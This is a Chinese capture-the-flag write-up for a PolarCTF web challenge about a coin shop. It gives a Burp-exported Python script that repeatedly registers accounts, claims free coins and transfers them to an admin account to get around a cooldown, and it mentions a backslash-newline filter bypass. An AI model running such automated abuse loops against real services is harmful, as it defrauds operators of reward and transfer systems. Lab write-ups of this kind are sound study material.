polarctfweb困难
老刘的小店
进去找到注册页面注册admin账号密码123456
进去之后在页面内发现有领取三个硬币的功能,点击可以领取但是领取后间隔60s才可以下一次领取,这里也尝试过很多修改时间和修改获取金币数量之类的操作,但其实都没有用,这道题其实后端代码写的非常严格,同时发现有一个转让硬币的功能,所以有了一个思路就是不断注册账号->获取硬币->转到一个账户,然后就可以凑够
以上的三个步骤需要的就是三个包,利用bp抓到后使用bp插件copy as python requests变成python代码,三个包的代码放在一起,循环执行
`import requests
burp0_url = "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/register.php"
burp0_cookies = {"PHPSESSID": "5j2nb9bgtmrrmj2jnm546q795b"}
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/register.php", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = {"username": "abc", "password": "123456"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
session = requests.session()
burp0_url = "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/dashboard.php"
burp0_cookies = {"PHPSESSID": "5j2nb9bgtmrrmj2jnm546q795b"}
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/dashboard.php", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = {"get_coins": ''}
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
session = requests.session()
burp0_url = "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/dashboard.php"
burp0_cookies = {"PHPSESSID": "5j2nb9bgtmrrmj2jnm546q795b"}
burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", "Origin": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090/dashboard.php", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = {"transfer": "1", "to_user": "admin", "amount": "4"}
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)`
执行一次刷新页面发现多四个硬币
写个循环就好了
这里其实有一个问题就是注册同一个账号的话手动会报错,但是携带cookie的话后端会通过校验,执行操作,有兴趣可以试着把cookie删掉,硬币并不会增长
购买后得到账号密码,登录后是老刘的生平介绍,从源码中发现php代码
可以发现没有过滤反斜杠,直接反斜杠换行绕过
浙公网安备 33010602011771号